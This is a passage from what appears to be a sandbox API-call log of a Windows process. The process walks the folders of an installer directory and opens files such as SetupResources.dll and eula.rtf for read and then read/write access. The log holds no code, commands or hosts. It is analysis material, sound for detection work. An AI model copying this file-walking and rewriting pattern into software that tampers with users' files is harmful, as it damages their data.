Size=0x30) returned 0x4e0a0 [0061.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0061.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.219] AreFileApisANSI () returned 1 [0061.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.219] AreFileApisANSI () returned 1 [0061.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0061.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 46 [0061.219] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.219] GetFileType (hFile=0x41c) returned 0x1 [0061.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.220] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.220] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.220] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.220] CloseHandle (hObject=0x41c) returned 1 [0061.220] AreFileApisANSI () returned 1 [0061.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x716f0 [0061.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 46 [0061.220] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.220] GetFileType (hFile=0x41c) returned 0x1 [0061.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0061.358] CloseHandle (hObject=0x41c) returned 1 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.359] AreFileApisANSI () returned 1 [0061.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0061.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 46 [0061.359] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558)) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.359] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.359] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.359] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46bb0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䕘")) returned 0 [0061.359] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0061.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46588 | out: hHeap=0x20000) returned 1 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0061.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0061.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.360] AreFileApisANSI () returned 1 [0061.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1045", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1045", lpUsedDefaultChar=0x0) returned 27 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.360] AreFileApisANSI () returned 1 [0061.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045") returned 27 [0061.361] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045" (normalized: "c:\\588bce7c90097ed212\\1045"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.361] GetLastError () returned 0x5 [0061.361] GetLastError () returned 0x5 [0061.361] SetLastError (dwErrCode=0x5) [0061.361] GetLastError () returned 0x5 [0061.361] SetLastError (dwErrCode=0x5) [0061.361] GetLastError () returned 0x5 [0061.361] SetLastError (dwErrCode=0x5) [0061.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.361] AreFileApisANSI () returned 1 [0061.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045") returned 27 [0061.361] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045" (normalized: "c:\\588bce7c90097ed212\\1045"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.361] GetLastError () returned 0x5 [0061.361] GetLastError () returned 0x5 [0061.362] SetLastError (dwErrCode=0x5) [0061.362] GetLastError () returned 0x5 [0061.362] SetLastError (dwErrCode=0x5) [0061.362] GetLastError () returned 0x5 [0061.362] SetLastError (dwErrCode=0x5) [0061.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.362] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.362] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.362] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.362] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0061.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0061.362] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1046", cAlternateFileName="")) returned 1 [0061.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.362] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0061.363] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.363] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0061.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0061.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0061.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0061.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0061.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.364] AreFileApisANSI () returned 1 [0061.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1045\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.364] AreFileApisANSI () returned 1 [0061.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: 